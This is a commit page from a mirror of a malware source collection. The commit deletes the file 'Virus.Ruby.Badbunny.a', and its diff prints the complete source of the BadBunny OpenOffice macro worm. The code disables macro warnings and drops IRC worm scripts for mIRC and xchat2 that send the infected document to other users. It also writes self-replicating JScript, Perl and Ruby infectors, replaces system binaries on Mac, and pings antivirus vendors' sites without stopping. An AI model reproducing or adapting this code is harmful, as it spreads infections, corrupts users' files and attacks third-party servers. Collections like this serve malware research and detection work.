Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

Delete Virus.Ruby.Badbunny.a 

N/A - Not Ruby

Submitted by: https://github.com/saouddk
This commit is contained in:
vxunderground 2020-10-17 15:48:45 -05:00 committed by GitHub
parent 198951943e
commit 5d2e97bf16
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 314 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

314
Ruby/Virus.Ruby.Badbunny.a
View File

@ -1,314 +0,0 @@
Dim Url As String
Dim myFileProp as Object
Sub badbunny()
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
mEventProps(0).Name = "EventType"
mEventProps(0).Value = "StarBasic"
mEventProps(1).Name = "Script"
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
oDocument = ThisComponent
otext=oDocument.text
ocursor=otext.createtextcursor()
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
call ping
end sub
sub startgame
if GetGUIType =1 then 'windows
call win
end if
if GetGUIType =3 then 'MacOS
call mac
end if
if GetGUIType =4 then 'linux
call lin
end if
end sub
sub win
Dim dirz As String
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="c:\badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
dirz=Environ ("programfiles")
Open "c:\drop.bad" For Output As #1
Print #1, "[script]"
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
Print #1, "n2=on 1:start:{"
Print #1, "n3= /if $day == Friday { /echo }"
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
Print #1, "n9=on 1:part:#:{"
Print #1, "n10=set %M_E $me"
Print #1, "n11=set %NickName $nick"
Print #1, "n12=set %ccd .dcc"
Print #1, "n13= if %NickName != %M_E {"
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
Print #1, "n15= /msg %NickName Be my bunny!"
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
Print #1, "n17= }"
Print #1, "n18=}"
Close #1
if ( Dir(dirz &"\mirc") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
end if
if ( Dir("c:\mirc") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
end if
if ( Dir(dirz &"\mirc32") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
end if
if ( Dir("c:\mirc32") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
end if
Open "c:\badbunny.js" For Output As #2
Print #2, "// BadBunny"
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
Print #2, "var OurCode=me.Read(1759)"
Print #2, "me.Close()"
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
Print #2, "{"
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
Print #2, "var Marker=filez.Read(11)"
Print #2, "var allinone=Marker+filez.ReadAll()"
Print #2, "filez.Close()"
Print #2, "if(Marker!=""// BadBunny"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
Print #2, "filez.Write(OurCode+allinone)"
Print #2, "filez.Close()"
Print #2, "}"
Print #2, "}"
Print #2, "}"
Print #2, "function foundit()"
Print #2, "{"
Print #2, "fcodea=''; count=0; randon='';"
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
Print #2, "i+=fcodea.length;"
Print #2, "}"
Print #2, "//->"
Close #2
Shell("c:\badbunny.js",0)
oDoc.store()
End Sub
sub lin()
'xchat2worm part by WarGame
dim HomeDir as string
dim xchat2script as string
dim perlvir as string
dim cmd as string
dim WgeT as string
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="/tmp/badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
' get home dir
HomeDir = Environ("HOME")
'build the path of our xchat2 script
if HomeDir = "" then
' I could not get $HOME !
else
xchat2script = HomeDir & "/.xchat2/badbunny.py"
' drop the python script
Open xchat2script For Output As #1
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
print #1,"import xchat"
print #1,"def onkick_cb(word, word_eol, userdata):"
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
print #1," return xchat.EAT_NONE"
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
close #1
endif
'drop the perl virus
perlvir = HomeDir & "/BadBunny.pl"
open perlvir for output as #1
print #1,"#BadBunny"
print #1,"open(File,$0);@MyCode = ;close(File);"
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
close #1
cmd = "perl " & perlvir
shell(cmd,0)
oDoc.store()
end sub
sub mac()
Dim iVar As Integer
iVar = Int((15 * Rnd) -2)
Select Case iVar
Case 1 To 5
call one
Case 6, 7, 8
call two
Case Is > 8 And iVar < 11
call one
Case Else
call two
End Select
end sub
sub one ()
'thx to skyout
Open "badbunny.rb" For Output As #1
print #1,"#!/usr/bin/env ruby"
print #1,"require 'ftools'"
print #1,"def replacecmd(cmdname, dirpath)"
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
print #1,"oldcmd.puts ""puts \""\"""""
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""3\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""2\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""1\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""for $args in $* do"""
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
print #1,"oldcmd.puts ""end"""
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
print #1,"oldcmd.puts ""exit 0"""
print #1,"end"
print #1,"$binary_dirs = Array.new"
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
print #1,"for $dir in $binary_dirs do"
print #1,"if File.directory?($dir) then"
print #1,"if File.writable?($dir) then"
print #1,"Dir.open($dir).each do |file|"
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
print #1,"replacecmd(file, $dir)"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"exit 0"
close #1
Shell("badbunny.rb",0)
end sub
sub two() 'thx to SPTH for this...
Open "badbunnya.rb" For Output As #2
print #2,"# BADB"
print #2,"mycode="""
print #2,"mych=File.open(__FILE__)"
print #2,"myc=mych.read(1)"
print #2,"while myc!=nil"
print #2,"mycode+=myc"
print #2,"myc=mych.read(1)"
print #2,"end"
print #2,"mycode=mycode[mycode.length-734,734]"
print #2,"cdir = Dir.open(Dir.getwd)"
print #2,"cdir.each do |a|"
print #2,"if File.ftype(a)==""file"" then"
print #2,"if a[a.length-3, a.length]=="".rb"" then"
print #2,"if a!=File.basename(__FILE__) then"
print #2,"fcode="""
print #2,"fle=open(a)"
print #2,"badb=fle.read(1)"
print #2,"while badb!=nil"
print #2,"fcode+=badb"
print #2,"badb=fle.read(1)"
print #2,"end"
print #2,"fle.close"
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
print #2,"fcode=fcode+13.chr+10.chr+mycode"
print #2,"fle=open(a,""w"")"
print #2,"fle.print fcode"
print #2,"fle.close"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"cdir.close"
close #2
Shell("badbunnya.rb",0)
End Sub
sub ping()
Shell("ping -l 5000 -t www.ikarus.at",0)
Shell("ping -l 5000 -t www.aladdin.com",0)
Shell("ping -l 5000 -t www.norman.no",0)
Shell("ping -l 5000 -t www.norman.com",0)
Shell("ping -l 5000 -t www.kaspersky.com",0)
Shell("ping -l 5000 -t www.kaspersky.ru",0)
Shell("ping -l 5000 -t www.kaspersky.pl",0)
Shell("ping -l 5000 -t www.grisoft.cz",0)
Shell("ping -l 5000 -t www.symantec.com",0)
Shell("ping -l 5000 -t www.proantivirus.com",0)
Shell("ping -l 5000 -t www.f-secure.com",0)
Shell("ping -l 5000 -t www.sophos.com",0)
Shell("ping -l 5000 -t www.arcabit.pl",0)
Shell("ping -l 5000 -t www.arcabit.com",0)
Shell("ping -l 5000 -t www.avira.com",0)
Shell("ping -l 5000 -t www.avira.de",0)
Shell("ping -l 5000 -t www.avira.ro",0)
Shell("ping -l 5000 -t www.avast.com",0)
Shell("ping -l 5000 -t www.virusbuster.hu",0)
Shell("ping -l 5000 -t www.trendmicro.com",0)
Shell("ping -l 5000 -t www.bitdefender.com",0)
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
Shell("ping -l 5000 -t www.drweb.com",0)
Shell("ping -l 5000 -t www.drweb.ru",0)
Shell("ping -l 5000 -t www.viruslist.com",0)
end sub